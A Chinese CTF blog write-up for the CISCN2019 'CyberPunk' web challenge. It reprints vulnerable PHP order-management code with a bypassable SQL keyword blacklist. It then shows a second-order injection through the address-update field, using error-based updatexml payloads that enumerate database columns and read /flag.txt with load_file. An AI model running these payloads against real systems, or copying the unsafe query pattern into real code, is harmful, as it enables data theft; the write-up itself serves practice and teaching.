[CISCN2019 华北赛区 Day1 Web5]CyberPunk

进入题目

点击左下角
发现不同文件

查看index.php检查发现

file参数
猜测文件包含用php为协议读取源码

require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
```
$msg = '';
```

$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';

```
$user_name = $_POST["user_name"];
```
```
$phone = $_POST["phone"];
```

if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){

```
    $msg = 'no sql inject!';
```
```
}else{
```

    $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";

```
    $fetch = $db->query($sql);
```
```
}
```

if (isset($fetch) && $fetch->num_rows>0){

```
    $row = $fetch->fetch_assoc();
```
```
    if(!$row) {
```
```
        echo 'error';
```
```
        print_r($db->error);
```
```
        exit;
```
```
    }
```

    $msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>";

```
} else {
```
```
    $msg = "未找到订单!";
```
```
}
```
}else {
```
$msg = "信息不全";
```
}
?>
<head>
<title>搜索</title>
</head>
<body>
```
<div class="container">
```
```
    <div class="row">
```

        <div class="col-md-8 col-md-offset-2 centered">

            <p style="margin:35px 0;"><br></p>

```
            <h1>订单查询</h1>
```
```
            <form method="post">
```
```
                <p>
```
```
                <h3>姓名:</h3>
```

                <input type="text" class="subscribe-input" name="user_name">

```
                <h3>电话:</h3>
```

                <input type="text" class="subscribe-input" name="phone">

```
                </p>
```
```
                <p>
```

                <button class='btn btn-lg  btn-sub btn-white' type="submit">查询订单</button>

```
                </p>
```
```
            </form>
```

            <?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?>

```
        </div>
```
```
    </div>
```
```
</div>
```
```
<div class="container">
```
```
    <div class="row">
```

        <p style="margin:35px 0;"><br></p>

        <h2 class="mb">订单管理</h2>

```
        <a href="./index.php">
```

            <button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>

```
        </a>
```
```
        <a href="./change.php">
```

            <button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button>

```
        </a> 
```
```
        <a href="./delete.php">
```

            <button class="btn btn-lg btn-register btn-white" >我不想要了</button>

```
        </a>    
```
```
    </div>
```
```
</div>
```
</body>
同理可得到其他文件的源码

delete.php

require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
```
$msg = '';
```

$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';

```
$user_name = $_POST["user_name"];
```
```
$phone = $_POST["phone"];
```

if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){

```
    $msg = 'no sql inject!';
```
```
}else{
```

    $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";

```
    $fetch = $db->query($sql);
```
```
}
```

if (isset($fetch) && $fetch->num_rows>0){

```
    $row = $fetch->fetch_assoc();
```

    $result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);

```
    if(!$result) {
```
```
        echo 'error';
```
```
        print_r($db->error);
```
```
        exit;
```
```
    }
```
```
    $msg = "订单删除成功";
```
```
} else {
```
```
    $msg = "未找到订单!";
```
```
}
```
}else {
```
$msg = "信息不全";
```
}
?>
<head>
<title>删除订单</title>
</head>
<body>
```
<div class="container">
```
```
    <div class="row">
```

        <div class="col-md-8 col-md-offset-2 centered">

            <p style="margin:35px 0;"><br></p>

```
            <h1>删除订单</h1>
```
```
            <form method="post">
```
```
                <p>
```
```
                <h3>姓名:</h3>
```

                <input type="text" class="subscribe-input" name="user_name">

```
                <h3>电话:</h3>
```

                <input type="text" class="subscribe-input" name="phone">

```
                </p>
```
```
                <p>
```

                <button class='btn btn-lg  btn-sub btn-white' type="submit">删除订单</button>

```
                </p>
```
```
            </form>
```

            <?php global $msg; echo '<h2 class="mb" style="color:#ffffff;">'.$msg.'</h2>';?>

```
        </div>
```
```
    </div>
```
```
</div>
```
```
<div class="container">
```
```
    <div class="row">
```

        <h2 class="mb">订单管理</h2>

```
        <a href="./index.php">
```

            <button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>

```
        </a>
```
```
        <a href="./search.php">
```

            <button class="btn btn-lg btn-register btn-white" >我要查订单</button>

```
        </a>
```
```
        <a href="./change.php">
```

            <button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button>

```
        </a>
```
```
    </div>
```
```
</div>
```
</body>

change.php

require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
```
$msg = '';
```

$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';

```
$user_name = $_POST["user_name"];
```

$address = addslashes($_POST["address"]);

```
$phone = $_POST["phone"];
```

if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){

```
    $msg = 'no sql inject!';
```
```
}else{
```

    $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";

```
    $fetch = $db->query($sql);
```
```
}
```

if (isset($fetch) && $fetch->num_rows>0){

```
    $row = $fetch->fetch_assoc();
```

    $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];

```
    $result = $db->query($sql);
```
```
    if(!$result) {
```
```
        echo 'error';
```
```
        print_r($db->error);
```
```
        exit;
```
```
    }
```
```
    $msg = "订单修改成功";
```
```
} else {
```
```
    $msg = "未找到订单!";
```
```
}
```
}else {
```
$msg = "信息不全";
```
}
?>
<head>
<title>修改收货地址</title>
</head>
<body>
```
<div class="container">
```
```
    <div class="row">
```

        <div class="col-md-8 col-md-offset-2 centered">

            <p style="margin:35px 0;"><br></p>

            <h1>修改收货地址</h1>

```
            <form method="post">
```
```
                <p>
```
```
                <h3>姓名:</h3>
```

                <input type="text" class="subscribe-input" name="user_name">

```
                <h3>电话:</h3>
```

                <input type="text" class="subscribe-input" name="phone">

```
                <h3>地址:</h3>
```

                <input type="text" class="subscribe-input" name="address">

```
                </p>
```
```
                <p>
```

                <button class='btn btn-lg  btn-sub btn-white' type="submit">修改订单</button>

```
                </p>
```
```
            </form>
```

            <?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?>

```
        </div>
```
```
    </div>
```
```
</div>
```
```
<div class="container">
```
```
    <div class="row">
```

        <p style="margin:35px 0;"><br></p>

        <h2 class="mb">订单管理</h2>

```
        <a href="./index.php">
```

            <button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>

```
        </a>
```
```
        <a href="./search.php">
```

            <button class="btn btn-lg btn-register btn-white" >我要查订单</button>

```
        </a>
```
```
        <a href="./delete.php">
```

            <button class="btn btn-lg btn-register btn-white" >我不想要了</button>

```
        </a>
```
```
    </div>
```
```
</div>
```
</body>

在change.php中发现可利用二次注入，它调用了旧地址

于是sql注入,报错注入
1' and updatexml(1,concat(0x7e,(substr((select group_concat(column_name) from information_schema.columns where table_name='user' and table_schema='ctfusers'),25,30)),0x7e),1)#

通过查表等操做发现数据库中没有flag,猜测在文件/flag.txt中,函数返回最长值有限分两次读取
1' and updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#
1' and updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),28,50)),0x7e),1)#

posted @ 2024-07-07 14:26 vзn0m 阅读(41) 评论(0) 收藏举报

刷新页面返回顶部

黑夜的黎明

水面之下，面具之后

[CISCN2019 华北赛区 Day1 Web5]CyberPunk

公告